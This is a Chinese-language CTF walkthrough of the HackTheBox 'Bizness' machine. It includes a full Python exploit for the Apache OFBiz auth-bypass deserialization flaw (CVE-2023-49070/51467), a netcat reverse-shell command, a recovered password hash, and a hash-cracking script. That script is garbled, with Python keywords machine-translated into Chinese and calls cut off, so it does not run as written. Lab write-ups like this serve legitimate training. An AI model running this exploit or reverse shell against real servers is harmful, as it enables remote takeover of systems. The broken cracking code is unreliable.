
admin 2024年2月1日21:30:25评论28 views字数 6911阅读23分2秒阅读模式




┌──(root㉿kali)-[/home/kali/Desktop/htb/Bizness]└─# nmap -sC -sV -T4 -Pn Nmap 7.94 ( ) at 2024-01-21 01:10 ESTWarning: giving up on port because retransmission cap hit (6).Nmap scan report for bizness.htb ( is up (0.26s latency).Not shown: 993 closed tcp ports (reset)PORT     STATE    SERVICE    VERSION22/tcp   open     ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: |   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)80/tcp   open     http       nginx 1.18.0|_http-title: Did not follow redirect to https://bizness.htb/|_http-server-header: nginx/1.18.0443/tcp  open     ssl/https?|_http-title: 400 The plain HTTP request was sent to HTTPS port| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK| Not valid before: 2023-12-14T20:03:40|_Not valid after:  2328-11-10T20:03:40|_ssl-date: TLS randomness does not represent time1055/tcp filtered ansyslmd2042/tcp filtered isis3404/tcp filtered unknown9944/tcp filtered unknownService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at .Nmap done: 1 IP address (1 host up) scanned in 144.81 seconds



HTB-Bizness(Easy) 发现是ofbiz,右下角有个18.12版本,直接在网上搜索poc,注意jdk11版本,kali可以用update-alternatives --config java切换

import argparseimport loggingimport osimport subprocessimport base64import requestsimport urllib3# Disable SSL verification warning for simplicityurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def validate_url(url):    """    Validate the URL schema.    """    if not url.startswith("http://") and not url.startswith("https://"):        raise ValueError("Invalid URL schema. Use 'http://' or 'https://'.")def scan(url):    """    Perform a basic scan on the specified URL.    """    print("[+] Scanning started...")    try:        target_url = f"{url}/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y"        response = requests.get(target_url, verify=False)        response.raise_for_status()  # Raise an HTTPError for bad responses (4xx or 5xx)        if "PONG" in response.text:            print("[+] Apache OFBiz instance seems to be vulnerable.")        else:            print("[-] Apache OFBiz instance seems NOT to be vulnerable.")    except requests.exceptions.RequestException as e:        print(f"[-] LOG: An error occurred during the scan: {e}")def get_encoded_payload(cmd):    """    Generate an encoded payload based on the provided command.    """    if not os.path.isfile("ysoserial-all.jar"):        logging.error("[-] ysoserial-all.jar not found. Exiting.")        exit(1)    print("[+] Generating payload...")    try:        #print(f"[+] Running the following command: {cmd}")        result =, shell=True, stdout=subprocess.PIPE, text=False)        encoded_output = base64.b64encode(result.stdout).decode().replace("n", "")        print("[+] Payload generated successfully.")    except subprocess.CalledProcessError as e:        print(f"[-] LOG: An error occurred during payload generation: {e}")    return encoded_outputdef send_post_request(url, encoded_output):    """    Send a POST request with a malicious serialized payload.    """    print("[+] Sending malicious serialized payload...")    try:        target_url = f"{url}/webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y"        headers = {            "Content-Type": "application/xml",        }        xml_data = f"""<?xml version="1.0"?>            <methodCall>              <methodName>Methodname</methodName>              <params>                <param>                  <value>                    <struct>                      <member>                        <name>test</name>                        <value>                          <serializable xmlns="">{encoded_output}</serializable>                        </value>                      </member>                    </struct>                  </value>                </param>              </params>            </methodCall>        """        response =, headers=headers, data=xml_data, verify=False)        if response.status_code == 200:            print("[+] The request has been successfully sent. Check the result of the command.")        else:            print("[-] Failed to send the request. Check the connection or try again.")    except requests.exceptions.RequestException as e:        print(f"[-] LOG: An error occurred during the scan: {e}")def main():    """    Main function for executing the script.    """    parser = argparse.ArgumentParser(description="Exploit script for Apache EFBiz auth vulnerability (CVE-2023-49070 and CVE-2023-51467).")    parser.add_argument("--url", required=True, help="EFBIZ's URL to send requests to.")    parser.add_argument("--cmd", help="Command to run on the remote server. Optional.")    args = parser.parse_args()    url = args.url.rstrip('/')    validate_url(args.url)    if args.cmd is None:        scan(url)    else:        command = f"java -jar --add-opens=java.xml/ --add-opens=java.xml/ --add-opens java.base/ --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"        encoded_output = get_encoded_payload(command)        send_post_request(url, encoded_output)if __name__ == "__main__":    main()
python3 --url https://bizness.htb  --cmd 'nc -e /bin/bash 4444'


fuzz到 /opt/ofbiz/runtime/data/derby目录,经过探索,我们得到了 derby 数据库并得到了 $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN。

$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN 定义了 SHA,使用“SHA-1”哈希算法,“d”表示盐,“uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN”保留值。

import hashlib import base64 import os from tqdm import tqdm class  PasswordEncryptor :     def  __init__ ( self, hash_type= "SHA" , pbkdf2_iterations= 10000 ):         """        使用哈希类型和 PBKDF2 迭代初始化 PasswordEncryptor 对象。        :param hash_type: 哈希使用的算法(默认为 SHA)。        :param pbkdf2_iterations: PBKDF2 的迭代次数(默认为 10000)。        """         self.hash_type = hash_type         self.pbkdf2_iterations = pbkdf2_iterations     def  crypt_bytes ( self, salt, value ):         "" "        使用指定的哈希类型和盐来加密密码。        :param salt: 加密中使用的盐。        :param value: 要加密的密码值。        :return: 加密的密码字符串。        """        如果 不是盐:            盐= base64.urlsafe_b64encode(os.urandom( 16 )).decode( 'utf-8' )         hash_obj =         hash_obj.update(salt.encode( 'utf-8' ))         hash_obj.update(值)         hashed_bytes = hash_obj.digest()        结果 = f"$ {self.hash_type} $ {salt} $ {base64.urlsafe_b64encode(hashed_bytes).decode( 'utf-8' ).replace( '+' , '.' )} "         return result     def  get_crypted_bytes ( self, salt, value ):         """        获取密码的加密字节。        :param salt: 加密中使用的盐。        :param value:要获取加密字节的密码值。        :return: 加密后的字节作为字符串。        """        尝试:            hash_obj =             hash_obj.update(salt.encode( 'utf-8' ))             hash_obj.update(value)             hashed_bytes = hash_obj.digest()             return base64.urlsafe_b64encode(hashed_bytes) .decode( 'utf-8' ).replace( '+' , '.        e:             raise Exception( f"计算{self.hash_type}类型的哈希值时出错: {e} " ) # 用法示例: hash_type = "SHA1" salt = "d" search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I= " wordlist = '/usr/wordlist/rockyou.txt' # 创建PasswordEncryptor类的实例encryptor = PasswordEncryptor(hash_type) # 获取加载栏的wordlist中的行数total_lines = sum ( 1  for _ in  open ( wordlist, 'r' , encoding= 'latin-1' )) # 使用加载栏迭代 wordlist 并检查是否有匹配的密码with  open (wordlist, 'r' , encoding= 'latin-1' ) as password_list:     for password in tqdm(password_list,total_lines,desc= "Processing" ):         value = password.strip()         # 获取加密密码        hashed_password = cryptor.crypt_bytes(salt, value.encode( 'utf-8' ))         #与搜索哈希进行比较        if hashed_password == search:             print ( f'Found Password: {value} , hash: {hashed_password} ' )             break   # 如果找到匹配则停止循环





hashcat -m 120 hash ~/rockyou.txt




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